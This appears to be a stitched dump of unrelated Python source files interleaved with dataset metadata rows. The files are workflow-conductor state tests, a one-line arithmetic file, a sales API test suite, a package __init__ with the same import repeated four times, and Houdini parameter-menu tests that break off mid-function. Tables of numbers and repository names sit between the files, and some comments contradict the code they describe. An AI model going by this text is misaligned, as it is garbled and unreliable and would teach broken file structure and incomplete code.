actual_tasks = conductor.get_next_tasks()
self.assert_task_list(actual_tasks, expected_tasks)
# Set the items to running state.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert that the task is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the items.
for i in range(0 + concurrency, len(task_ctx['xs'])):
context = {'item_id': i}
result = task_ctx['xs'][i]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow are completed.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pending_item(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.PENDING, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow is paused.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_resume_pending_item(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.PENDING, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the paued action execution.
context = {'item_id': 1}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the resumed action execution.
context = {'item_id': 1}
result = task_ctx['xs'][1]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result=result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the task and workflow succeeded.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_resume_partial(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.PAUSED, states.SUCCEEDED]
expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is not removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
# Resume the paued action execution.
context = {'item_id': 1}
ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task and workflow is running.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Complete the resumed action execution.
context = {'item_id': 1}
result = task_ctx['xs'][1]
ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result=result, context=context)
conductor.update_task_flow(task_name, ac_ex_event)
# Assert the task is removed from staging.
self.assertIn(task_name, conductor.flow.staged)
# Assert the task and workflow is paused.
self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_task_cycle(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
init:
next:
- do: task1
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- when: <% failed() %>
do: task1
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Get pass the init task, required for bootstrapping self looping task..
conductor.update_task_flow('init', events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow('init', events.ActionExecutionEvent(states.SUCCEEDED))
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
expected_task_states = [states.RUNNING, states.FAILED]
expected_workflow_states = [states.RUNNING] * 2
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is reset in staging.
self.assertIn(task_name, conductor.flow.staged)
self.assertNotIn('items', conductor.flow.staged[task_name])
# Assert the workflow is still running.
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
# Mock the second task execution.
mock_ac_ex_states = [states.SUCCEEDED] * 4
expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
| 34.341223
| 99
| 0.566754
| 7,450
| 69,644
| 5.085906
| 0.025638
| 0.032515
| 0.047664
| 0.051148
| 0.975429
| 0.974716
| 0.972816
| 0.972816
| 0.965901
| 0.961019
| 0
| 0.00639
| 0.310134
| 69,644
| 2,027
| 100
| 34.358165
| 0.782246
| 0.09728
| 0
| 0.919048
| 0
| 0
| 0.242206
| 0
| 0
| 0
| 0
| 0
| 0.121088
| 1
| 0.018367
| false
| 0
| 0.003401
| 0
| 0.022449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acf51b647b1cdf38270a34439e594bceba13426a
| 304
|
py
|
Python
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 18
|
2021-05-10T04:10:44.000Z
|
2022-02-09T14:36:08.000Z
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 4
|
2021-07-08T06:29:54.000Z
|
2021-08-02T08:51:01.000Z
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 4
|
2021-12-14T02:39:20.000Z
|
2022-02-14T02:38:58.000Z
|
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
| 33.777778
| 74
| 0.894737
| 56
| 304
| 4.285714
| 0.178571
| 0.233333
| 0.333333
| 0.266667
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.092105
| 304
| 8
| 75
| 38
| 0.869565
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 14
|
c5cbde4b50482caaf94c4055ebf61dac8c42b2ae
| 7
|
py
|
Python
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | 1
|
2021-10-06T22:58:46.000Z
|
2021-10-06T22:58:46.000Z
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | 4
|
2021-09-24T16:03:28.000Z
|
2021-11-24T01:13:53.000Z
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | null | null | null |
5+3*2
| 3.5
| 6
| 0.428571
| 3
| 7
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 0.285714
| 7
| 1
| 7
| 7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5dac561a9267017bd49c9798c21631ae094d9df
| 9,196
|
py
|
Python
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | 2
|
2018-10-24T08:16:08.000Z
|
2021-09-29T20:28:00.000Z
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | 4
|
2018-10-24T01:50:45.000Z
|
2019-10-21T17:25:08.000Z
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | null | null | null |
import unittest
import json
from app.tests.base_test import BaseTest
class TestSales(BaseTest):
"""Sales Endpoints Test Suite"""
def test_user_can_post_sales(self):
"""Test that user can post sales"""
self.user_authentication_register(email="mail1234@mail.com", password="password", confirm_password="password", role="admin")
login_response = self.user_authentication_login(email="mail1234@mail.com", password="password")
authentication_token = json.loads(login_response.data.decode())['token']
product_posted = self.client().post('/api/v2/products',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({"product_name": "cake",
"product_description": "sweet and lovely",
"product_quantity": 5,
"product_price": 100,
"product_category": "bakery",
"product_minorder": 100}))
result = json.loads(product_posted.data.decode())
self.assertEqual(result['message'], 'Product cake added to inventory')
self.assertEqual(product_posted.status_code, 201)
sales_posted = self.client().post('/api/v2/sales',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({
"product_quantity": 1,
"product_id": 1
}))
result = json.loads(sales_posted.data.decode())
self.assertEqual(result['status'], 'ok')
self.assertEqual(sales_posted.status_code, 201)
def test_fetch_all_sales(self):
"""Test that user can retrieve all sales"""
self.user_authentication_register(email="mail1234@mail.com", password="password", confirm_password="password", role="admin")
login_response = self.user_authentication_login(email="mail1234@mail.com", password="password")
authentication_token = json.loads(login_response.data.decode())['token']
product_posted = self.client().post('/api/v2/products',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({"product_name": "cake",
"product_description": "sweet and lovely",
"product_quantity": 5,
"product_price": 100,
"product_category": "bakery",
"product_minorder": 100}))
result = json.loads(product_posted.data.decode())
self.assertEqual(result['message'], 'Product cake added to inventory')
self.assertEqual(product_posted.status_code, 201)
sell_posted_product = self.client().post('/api/v2/sales',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({
"product_quantity": 1,
"product_id": 1
}))
result = json.loads(sell_posted_product.data.decode())
self.assertEqual(result['status'], 'ok')
self.assertEqual(sell_posted_product.status_code, 201)
fetch_sales = self.client().get('/api/v2/sales',
headers=dict(Authorization="Bearer {}".format(authentication_token)))
fetch_sales_data = json.loads(fetch_sales.data)
self.assertEqual(fetch_sales.status_code, 200)
self.assertEqual(fetch_sales_data['status'], 'ok')
def test_fetch_single_sale(self):
"""Test that user can retrieve single sale"""
self.user_authentication_register(email="mail1234@mail.com", password="password", confirm_password="password", role="admin")
login_response = self.user_authentication_login(email="mail1234@mail.com", password="password")
authentication_token = json.loads(login_response.data.decode())['token']
product_posted = self.client().post('/api/v2/products',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({"product_name": "cake",
"product_description": "sweet and lovely",
"product_quantity": 5,
"product_price": 100,
"product_category": "bakery",
"product_minorder": 100}))
result = json.loads(product_posted.data.decode())
self.assertEqual(result['message'], 'Product cake added to inventory')
self.assertEqual(product_posted.status_code, 201)
sales_posted = self.client().post('/api/v2/sales',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({
"product_quantity": 1,
"product_id": 1
}))
result = json.loads(sales_posted.data.decode())
self.assertEqual(result['status'], 'ok')
self.assertEqual(sales_posted.status_code, 201)
fetch_sales_record = self.client().get('/api/v2/sales/1',
headers=dict(Authorization="Bearer {}".format(authentication_token)))
self.assertEqual(fetch_sales_record.status_code, 200)
def test_attendant_cannot_get_all_sales(self):
"""Test that attendant cannot get all sales"""
self.user_authentication_register(email="mail1234@mail.com", password="password", confirm_password="password", role="admin")
login_response = self.user_authentication_login(email="mail1234@mail.com", password="password")
authentication_token = json.loads(login_response.data.decode())['token']
product_posted = self.client().post('/api/v2/products',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({"product_name": "cake",
"product_description": "sweet and lovely",
"product_quantity": 5,
"product_price": 100,
"product_category": "bakery",
"product_minorder": 100}))
result = json.loads(product_posted.data.decode())
self.assertEqual(result['message'], 'Product cake added to inventory')
self.assertEqual(product_posted.status_code, 201)
sales_posted = self.client().post('/api/v2/sales',
content_type="application/json",
headers=dict(Authorization="Bearer {}".format(authentication_token)),
data=json.dumps({
"product_quantity": 1,
"product_id": 1
}))
result = json.loads(sales_posted.data.decode())
self.assertEqual(result['status'], 'ok')
self.assertEqual(sales_posted.status_code, 201)
self.user_authentication_register(email="attendant@mail.com", password="password", confirm_password="password", role="attendant")
login_response = self.user_authentication_login(email="attendant@mail.com", password="password")
authentication_token = json.loads(login_response.data.decode())['token']
fetch_sales_record = self.client().get('/api/v2/sales/1',
headers=dict(Authorization="Bearer {}".format(authentication_token)))
self.assertEqual(fetch_sales_record.status_code, 406)
| 62.557823
| 137
| 0.514028
| 790
| 9,196
| 5.781013
| 0.111392
| 0.065689
| 0.057806
| 0.072258
| 0.925772
| 0.908474
| 0.869718
| 0.847821
| 0.836873
| 0.825049
| 0
| 0.019934
| 0.378099
| 9,196
| 146
| 138
| 62.986301
| 0.778633
| 0.01903
| 0
| 0.844262
| 0
| 0
| 0.166759
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 1
| 0.032787
| false
| 0.081967
| 0.02459
| 0
| 0.065574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c5fe4aec8329561bdb382f66aa49f411438e101b
| 358
|
py
|
Python
|
test_addons/__init__.py
|
vishal180618/django-test-addons
|
35317b718ca6f3269ff3e1552e93796237022b58
|
[
"MIT"
] | 23
|
2015-07-28T17:27:44.000Z
|
2020-07-16T09:27:45.000Z
|
test_addons/__init__.py
|
hspandher/django-test-utils
|
3bb7d488062ebabb6acc95f51db6f0dcccc97bd5
|
[
"MIT"
] | 6
|
2015-08-02T19:21:40.000Z
|
2017-11-16T06:02:20.000Z
|
test_addons/__init__.py
|
hspandher/django-test-utils
|
3bb7d488062ebabb6acc95f51db6f0dcccc97bd5
|
[
"MIT"
] | 13
|
2015-07-28T17:40:58.000Z
|
2019-03-25T09:00:40.000Z
|
from .test_cases import (MongoTestCase, MongoLiveServerTestCase, SimpleTestCase, RedisTestCase, Neo4jTestCase, RedisMongoNeo4jTestCase, MongoRedisTestCase, APIRedisTestCase, APIMongoTestCase, APINeo4jTestCase, APIMongoRedisTestCase, APIRedisMongoNeo4jTestCase)
from .utils import EnhancedHttpRequest, TestViewMixin, ClearFileStorageMixin, ModifySessionMixin
| 119.333333
| 260
| 0.888268
| 23
| 358
| 13.782609
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 0.061453
| 358
| 2
| 261
| 179
| 0.931548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a866de909d7968a585799afb48f3af9c89c83e80
| 29,455
|
py
|
Python
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 136
|
2015-01-03T04:03:23.000Z
|
2022-02-07T11:08:57.000Z
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 11
|
2017-02-09T20:05:04.000Z
|
2021-01-24T22:25:59.000Z
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 26
|
2015-08-18T12:11:02.000Z
|
2020-12-19T01:53:31.000Z
|
"""Tests for ht.ui.menus.parmmenu module."""
# =============================================================================
# IMPORTS
# =============================================================================
# Third Party
import pytest
# Houdini Toolbox
import ht.ui.menus.parmmenu
# Houdini
import hou
# =============================================================================
# TESTS
# =============================================================================
class Test__valid_to_convert_to_absolute_reference:
"""Test ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference."""
def test_empty_string(self, mocker):
"""Test when the path is an empty string."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mocker.MagicMock(spec=str)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_parm.keyframes.assert_not_called()
def test_not_relative(self, mocker):
"""Test when the path does not seem to be relative."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = False
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("..")
mock_parm.keyframes.assert_not_called()
def test_keyframes(self, mocker):
"""Test when the parameter has keyframes."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("..")
mock_parm.keyframes.assert_called()
mock_parm.unexpandedString.assert_not_called()
def test(self, mocker):
"""Test when the path can be converted to an absolute path."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
mock_parm.evalAsNode.return_value = mocker.MagicMock(spec=hou.Node)
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert result
mock_path.startswith.assert_called_with("..")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_called()
def test_invalid_path(self, mocker):
"""Test when the path does not point to a valid node."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
mock_parm.evalAsNode.return_value = None
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("..")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_called()
def test_expression(self, mocker):
"""Test when the path does not match the unexpanded string (is an expression)."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mocker.MagicMock(spec=str)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("..")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_not_called()
def test_not_node_reference(self, mocker):
"""Test when the string parameter is not a node reference."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = mocker.MagicMock(
spec=hou.stringParmType
)
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
mock_parm.eval.assert_not_called()
def test_not_string_parm(self, mocker):
"""Test when the string parameter is not a node reference."""
mock_template = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference(mock_parm)
assert not result
class Test__valid_to_convert_to_relative_reference:
"""Test ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference."""
def test_empty_string(self, mocker):
"""Test when the path is an empty string."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mocker.MagicMock(spec=str)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_parm.keyframes.assert_not_called()
def test_not_absolute(self, mocker):
"""Test when the path does not seem to be absolute."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = False
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("/")
mock_parm.keyframes.assert_not_called()
def test_keyframes(self, mocker):
"""Test when the parameter has keyframes."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("/")
mock_parm.keyframes.assert_called()
mock_parm.unexpandedString.assert_not_called()
def test(self, mocker):
"""Test when the path can be converted to a relative path."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
mock_parm.evalAsNode.return_value = mocker.MagicMock(spec=hou.Node)
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert result
mock_path.startswith.assert_called_with("/")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_called()
def test_invalid_path(self, mocker):
"""Test when the path does not point to a valid node."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
